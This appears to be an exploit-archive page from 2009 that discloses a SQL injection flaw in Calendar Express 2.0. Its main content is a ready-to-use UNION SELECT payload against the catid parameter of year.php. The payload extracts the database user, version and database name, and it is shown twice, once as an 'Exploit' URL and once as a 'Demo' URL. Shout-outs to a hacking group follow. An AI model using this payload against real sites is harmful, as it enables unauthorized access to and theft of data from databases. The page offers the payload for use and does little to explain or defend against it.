[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Calendar Express 2.0 SQL Injection Vulnerability
# Published : 2009-12-28
# Author : Baybora
# Previous Title : ES Simple Uploader v 1.1 Upload Shell Vulnerability
# Next Title : Joomla Component com_calendario Blind SQL injection Vulnerability
#############################################################
# Calendar Express 2.0 Vulnerability
# Calendar Express 2.0 [Powered by Phplite.com]
# Download:http://script.wareseeker.com/download/calendar-express-2.rar/11517
# Author: Baybora
# Site: www.1923turk.biz<http://www.1923turk.biz>
##############################################################
Exploit:
POST http://localhost/calendarexpress2.1/year.php?catid=-4+union+select+0,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1),2/*&cid=&w=&d=9&m=1&y=2008&selection=1
Demo:
http://server/calendarexpress2.1/year.php?catid=-4+union+select+0,convert(concat(USER(),0x3a,VERSION(),0x3a,DATABASE())+using+latin1),2/*&cid=&w=&d=9&m=1&y=2008&selection=1
Special Thanks:Gamoscu~~Manas58~~X-TRO~~Tiamo~~PSİKO~~Delibey~~_infazcı_PALYO34&All 1923TURK Member's